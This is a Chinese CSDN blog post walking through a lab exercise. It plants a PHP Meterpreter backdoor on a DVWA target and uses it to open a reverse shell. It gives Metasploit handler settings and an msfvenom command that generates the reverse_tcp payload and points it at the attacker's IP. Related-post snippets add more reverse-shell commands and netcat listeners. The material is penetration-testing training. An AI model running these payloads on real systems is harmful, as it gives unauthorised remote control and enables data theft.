PHP后门反弹连接DVWA

已于 2022-03-31 14:46:47 修改
阅读量3.2k 收藏 6
点赞数 1
分类专栏: 网络安全 文章标签: 安全 php 网络安全
于 2022-03-31 14:44:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57379855/article/details/123870497
版权

PHP后门反弹连接DVWA

环境准备

操作系统准备

kali : 192.168.202.133
在这里插入图片描述

win10:192.168.202.139

在这里插入图片描述

DVWA靶场准备

DVWA下载

注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境

在这里插入图片描述
设置网站
在这里插入图片描述

配置数据库密码
与数据库设置保持一致
在这里插入图片描述

在这里插入图片描述

metasploit配置监控及攻击载荷

配置监控

使用handler模块

use exploit/multi/handler
在这里插入图片描述

配置攻击载荷

第一步设置payload
set payload php/meterpreter/reverse_tcp
在这里插入图片描述

第二步设置 lhost 和 lport
set lhost xxxip ;
set lport xxx端口;
在这里插入图片描述

生成php后门

执行攻击获得meterpreter
新建一个终端在终端内输入

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 R>shell.php
在这里插入图片描述

上传后门文件

使用Python简单的web服务,把后门文件下载到WIN10
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

访问该木马文件
在这里插入图片描述

后渗透获取数据库信息

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

half~
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1963
powershell反弹shell常见方式 文章目录正向连接和反向连接反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接反弹连接) PowerShell的配置 常见的反弹Shell 总结
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程
Amdy_amdy的博客
08-23 2829
Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程 由于是实战,肯定要一个服务器对吗?为了不搞破坏,我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站(用phpstudy快速搭建的),这台电脑IP是:192.168.1.103; 我用的是渗透测试系统Kali Linux,由于此系统是自带Metasploit,我的Kali Linux系统IP是:192.168.40.132,并且能够通过火狐浏览器正常访问到192.168.1
Python 渗透测试:反弹 shell (反弹 后门 || 程序免杀)
最新发布
网络安全领域___专研者.
05-15 1991
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
TCP连接反弹技术
weixin_43049833的博客
02-08 513
总的来说,反弹shell的基础操作包括在攻击者的机器上设置一个监听端口,然后在受害者机器上使用特定的命令将标准输入输出重定向到该端口,从而实现远程控制。在反弹技术中,Netcat可以用来在攻击者的机器上监听特定端口,等待从受害者机器上发出的连接请求,一旦连接建立,就可以进行命令执行和数据传输。其次,反弹技术,也被称为反向连接反弹shell,是攻击者在被害主机上执行的命令能够通过网络送回到攻击者机器上的一种技术。在TCP/IP协议中,TCP提供数据传输过程中的连接建立、数据包排序和错误恢复等机制。
反弹连接基础
qq_45455136的博客
03-11 5059
反弹连接反弹连接适应情况常见端口监听方式建立反弹连接方式反弹连接流程 反弹连接适应情况 没有安装HTTP Server或找不到网站目录 内网,私有IP IP动态变化 6379端口不允许入方向 一句话木马被删除 常见端口监听方式 netcat:nc -lvp 7777 msf: msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.37.130 set lport 77
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2571
php后门反弹,就是通过php后门文件,对目标进行操控。本次使用msf完成(仅供学习)
PHPDVWA文件包
07-28
**PHPDVWA文件包详解** 本压缩包包含两个核心组件:`phpstudy_x64_8.1.1.3` 和 `DVWA-master`。这两个组件都是针对PHP开发和安全测试的重要工具。 首先,我们来详细了解`phpstudy_x64_8.1.1.3`。这是一款集成的...
135-PHP、Apache环境中部署DVWA
09-08
DVWAPHP、Apache 环境中的部署指南 DVWA(Damn Vulnerable Web Application)是一款开源的 Web 应用程序漏洞靶场工具,旨在帮助开发者和安全研究者学习和实践 Web 应用程序安全漏洞的检测和防御。DVWA 需要 PHP...
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
PHP、Apache环境中部署DVWA(综合靶场)
01-08
PHP和Apache环境下部署DVWA,可以提供一个可控的环境来学习和测试这些安全问题。 首先,你需要一个PHP和Apache的运行环境。这里推荐使用PHPStudy,它是一个集成了PHP和Apache的便捷工具。按照《01-Windows安装...
生成常用的msf
weixin_34268310的博客
01-08 230
生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 生成二进...
反弹连接vlunhub靶机prinme1
m0_57379855的博客
09-25 470
2021-9-3 通过ip获取root权限漏洞靶机下载扫描局域网内的C段主机扫描端口获得运行的服务扫描目录获得关键信息fuzz获得正确的参数wordpress漏洞利用msfvenom生成反弹shellmsfconsole监听利用Ubuntu内核提权渗透测试的流程与技术 漏洞靶机下载 提供靶机的镜像平台链接 https://www.vulnhub.com/ 该平台有非常多的漏洞靶机镜像 今天测试的靶机链接为 https://www.vulnhub.com/entry/prime-1,358/ 点击下载,直接
反弹shell的正向连接和反向连接
qq_44833342的博客
05-29 390
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 808
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
php Meterpreter Webshell
iteye_16188的博客
11-17 373
1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.php到web服务器 3. 启动msfconsole 4. use multi/handler 5. set LHOST Attacker's_IP 6. set LPORT 443 7. set ...
Metasploit渗透框架超详细
HAKUNAMATATATTA的博客
12-26 2006
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。MSF所有的漏洞测试都是基于模块。
msf反弹shell
cj_Hydra's Blog
02-01 1471
windows+exe反弹 使用msfvenom模块生成一个被控端的客户端文件,这里用windows 64为例(如果不加x64,则默认是32位),此时就会生成一个shell.exe的程序。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=攻击机ip地址 lport=监听端口 -f exe >shell.exe 在攻击机的m...
MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷
qq_51550750的博客
06-02 943
msf——PHP后门反弹连接
DVWA反弹shell实验
命运的旋律的博客
12-13 1302
反弹shell实验 实验环境:metasploitable2;dvwa-linux版 ##操作过程 进入kali的web服务根目录/var/www/html,写入getshell.py的python程序 #leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socket. SOC...
dvwa数据库连接失败
08-22
你好,很抱歉听到您在连接 DVWA 数据库时遇到了问题。有几个可能的原因导致连接失败,我会为您列举一些常见的解决方法,请您尝试以下步骤: 1. 检查数据库配置:确保您在连接数据库时使用了正确的主机名、用户名、密码和数据库名称。请确认这些信息是否正确,并在连接过程中没有拼写错误或其他形式的输入错误。 2. 检查数据库服务是否运行:确认数据库服务器正在运行。您可以尝试重启数据库服务并再次连接。 3. 检查防火墙设置:如果您的服务器上启用了防火墙,请确保允许从您的应用程序服务器访问数据库服务器的网络流量。您可能需要配置防火墙规则以允许正确的数据库端口通信。 4. 检查数据库权限:确保您使用的数据库用户具有足够的权限来连接和操作所需的数据库。可以尝试使用具有更高权限的用户进行连接,以排除权限问题。 5. 检查网络连接:确保网络连接正常,您可以尝试 ping 数据库服务器以确认是否可以与之进行通信。 这些是一些常见的解决方法,希望对您有帮助。如果问题仍然存在,请提供更多详细信息,例如错误消息或日志,以便我们更好地帮助您解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值